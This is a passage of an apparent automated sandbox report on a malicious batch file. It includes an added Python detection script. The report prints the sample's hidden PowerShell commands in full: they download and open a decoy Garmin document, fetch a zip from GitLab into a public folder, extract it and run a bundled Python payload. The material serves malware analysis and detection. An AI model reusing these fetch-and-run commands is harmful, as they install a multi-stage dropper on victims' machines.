                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
                  Source: powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uca83ad3860e00ba9c5292268edd.dl.dropboxusercontent.com/cd/0/get/Cgi0y-YI8TenZYJubto-r9s_MQQd
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF340000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                  Source: powershell.exe, 0000000C.00000002.1496282413.0000020CDC340000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496607984.0000020CDC530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.do
                  Source: powershell.exe, 0000000C.00000002.1528756841.0000020CF6390000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.do
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                  Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.dropboxstatic.com/static/
Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com/ns.html
Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501645000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501626000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hellofax.com/
Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.hellosign.com/
Source: powershell.exe, 0000000C.00000002.1496759900.0000020CDF7EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF812000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1496759900.0000020CDF80E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.paypal.com/sdk/js
Source: powershell.exe, 0000000E.00000002.1584428217.000002C501649000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.recaptcha.net/
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | HTTPS traffic detected: 162.125.69.18:443 -> 192.168.2.8:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: classification engine | Classification label: mal88.troj.evad.winBAT@30/16@3/2
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\Desktop\tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3344:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sml4d1bp.3hn.ps1
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fghdsdf17.bat" "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\chcp.com | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp.com 437
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I set "C:\Users\user\Desktop\fghdsdf17.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I goto "C:\Users\user\Desktop\fghdsdf17.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I echo "C:\Users\user\Desktop\fghdsdf17.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\findstr.exe findstr /L /I pause "C:\Users\user\Desktop\fghdsdf17.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\find.exe find
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c type tmp
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
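The process-creation rows above describe a complete chain: cmd.exe runs the batch, which greps its own file with findstr for tokens such as set/goto/echo/pause (a self-inspection check), then spawns hidden PowerShell instances that download a decoy .docx into Temp and open it, download a zip from GitLab into C:\Users\Public, extract it there, and finally run the bundled pythonw.exe on a .pd file. The script below is an added example of detection logic over that chain, written for this page and not part of the Joe Sandbox report or of any Sigma rule. The command lines are the ones listed in the report; the event structure, the parent/child links, and every PID other than cmd.exe 5892 and chcp.com 2168 are assumptions made for the example, and the final "benign" event is constructed as a control.

```python
"""Process-creation heuristics for the batch -> hidden PowerShell -> pythonw chain
shown in this report. Added example; not part of the sandbox report."""
import re
from collections import defaultdict

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
BAT = r"C:\Users\user\Desktop\fghdsdf17.bat"

# Constructed sample events. Command lines are copied from the report; only
# cmd.exe (5892) and chcp.com (2168) have PIDs in the report, so the other
# PIDs and all parent links are assumptions made for this example.
EVENTS = [
    {"pid": 5892, "ppid": 1200, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\Windows\system32\cmd.exe /c ""' + BAT + r'" "'},
    {"pid": 2168, "ppid": 5892, "image": r"C:\Windows\System32\chcp.com", "cmdline": "chcp.com 437"},
    {"pid": 6100, "ppid": 5892, "image": r"C:\Windows\System32\findstr.exe",
     "cmdline": 'findstr /L /I set "' + BAT + '"'},
    {"pid": 6101, "ppid": 5892, "image": r"C:\Windows\System32\findstr.exe",
     "cmdline": 'findstr /L /I goto "' + BAT + '"'},
    {"pid": 6200, "ppid": 5892, "image": PS, "cmdline": r'''powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"'''},
    {"pid": 6201, "ppid": 5892, "image": PS, "cmdline": r'''powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"'''},
    {"pid": 6202, "ppid": 5892, "image": PS, "cmdline": r'''powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"'''},
    {"pid": 6203, "ppid": 5892, "image": PS, "cmdline": r'''powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"'''},
    {"pid": 6204, "ppid": 5892, "image": PS, "cmdline": r'''powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"'''},
    # Constructed benign control: an interactive directory listing; nothing should fire.
    {"pid": 7000, "ppid": 3000, "image": PS, "cmdline": r'''powershell.exe -Command "Get-ChildItem 'C:\Users\Public'"'''},
]

HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
DOWNLOAD_RE = re.compile(r"\.DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'", re.I)
EXTRACT_RE = re.compile(r"ZipFile\]::ExtractToDirectory\(\s*'([^']+)'\s*,\s*'([^']+)'", re.I)
START_RE = re.compile(r"Start-Process\s+'([^']+)'", re.I)
PYTHON_RE = re.compile(r"(\S*pythonw?\.exe)\s+(\S+)", re.I)
FINDSTR_RE = re.compile(r'findstr\s+(?:/\w+\s+)*(\S+)\s+"?([^"\s]+\.bat)"?', re.I)

WRITABLE_DIRS = ("\\users\\public\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\")
SCRIPT_EXTS = (".py", ".pyw")
# All three stages under one parent is treated as a multi-stage dropper chain.
CHAIN = {"ps_hidden_download", "zip_extract_writable", "python_nonpy_script"}


def norm(path):
    """Lower-case, backslash-only form so C:/Users/Public spellings still match."""
    return path.replace("/", "\\").strip().lower()


def in_writable_dir(path):
    return any(d in norm(path) for d in WRITABLE_DIRS)


def check_event(ev):
    """Rules that need only the event itself; returns the rule names that fire."""
    cmd = ev["cmdline"]
    hits = []
    if ev["image"].lower().endswith("powershell.exe"):
        m = DOWNLOAD_RE.search(cmd)
        if m and (HIDDEN_RE.search(cmd) or in_writable_dir(m.group(2))):
            hits.append("ps_hidden_download")
        m = START_RE.search(cmd)
        if m and in_writable_dir(m.group(1)):
            hits.append("ps_start_process_writable")
        m = EXTRACT_RE.search(cmd)
        if m and in_writable_dir(m.group(1)):
            hits.append("zip_extract_writable")
    # A Python interpreter in a user-writable directory run on a file that is not
    # a .py/.pyw script (here: pythonw.exe on ld_312.pd), whatever process wraps it.
    m = PYTHON_RE.search(cmd)
    if m and in_writable_dir(m.group(1)) and not norm(m.group(2)).endswith(SCRIPT_EXTS):
        hits.append("python_nonpy_script")
    return hits


def detect(events):
    """Per-event rules, the parent-aware findstr rule, and chain correlation.
    Returns (rule, pid) pairs; dropper_chain carries the parent's pid."""
    by_pid = {e["pid"]: e for e in events}
    per_parent = defaultdict(set)
    findings = []
    for ev in events:
        hits = check_event(ev)
        m = FINDSTR_RE.search(ev["cmdline"])
        parent = by_pid.get(ev["ppid"])
        # The findstr target is the very .bat its parent cmd.exe is executing:
        # the script is searching its own text.
        if m and parent and norm(m.group(2)) in norm(parent["cmdline"]):
            hits.append("bat_self_inspection")
        for h in hits:
            findings.append((h, ev["pid"]))
            per_parent[ev["ppid"]].add(h)
    for ppid, rules in per_parent.items():
        if CHAIN <= rules:
            findings.append(("dropper_chain", ppid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:26} pid={pid}")
```

The per-event rules mirror the Sigma hits listed in the report (PowerShell DownloadFile, web download, script execution from Temp); the two parent-aware rules are what the flat signature list cannot express: findstr run against the file its own parent is executing, and download, extract and interpreter launch all issued by the same cmd.exe.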
Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com | Section loaded: ulib.dll, fsutilext.dll
Source: C:\Windows\System32\find.exe | Section loaded: ulib.dll, fsutilext.dll
Source: C:\Windows\System32\find.exe | Section loaded: ulib.dll, fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, propsys.dll, apphelp.dll, dlnashext.dll, wpdshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, msasn1.dll, msisip.dll, wshext.dll, gpapi.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: Binary string: e.pdb source: powershell.exe, 0000000C.00000002.1528813287.0000020CF64A2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbe source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb@ source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ystem.Core.pdbb source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: m.pdbz source: powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdber source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: utomation.pdb source: powershell.exe, 00000010.00000002.1808397929.000001A329DC3000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000C.00000002.1527759165.0000020CF620F000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: *on.pdb source: powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Hn.pdb source: powershell.exe, 00000010.00000002.1811344347.000001A329EF0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb source: powershell.exe, 0000000E.00000002.1660483962.000002C56FF71000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ion.pdb source: powershell.exe, 0000000E.00000002.1662345043.000002C5701FB000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb\2 source: powershell.exe, 0000000C.00000002.1528813287.0000020CF64A2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbone-int.G source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb- source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb+ source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 089\System.Core.pdb source: powershell.exe, 0000000C.00000002.1527759165.0000020CF627C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdb( source: powershell.exe, 0000000E.00000002.1662345043.000002C57023E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Qe.pdb source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: 6?ll\System.Core.pdb% source: powershell.exe, 0000000E.00000002.1660483962.000002C57002C000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Core.pdbk source: powershell.exe, 0000000E.00000002.1660483962.000002C56FF71000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: Yara matchFile source: fghdsdf17.bat, type: SAMPLE
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.docx?rlkey=r2rwmqao9egm53biwvt2zwpbv&st=qk880f0g&dl=1', 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\\Garmin_Campaign_Information_for_Partners_V10.docx'"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object -TypeName System.Net.WebClient).DownloadFile('https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip', 'C:\Users\Public\Document.zip')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory('C:/Users/Public/Document.zip', 'C:/Users/Public/Document')"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command " C:\Users\Public\Document\pythonw.exe C:\Users\Public\Document\DLLs\ld_312.pd clickapp"
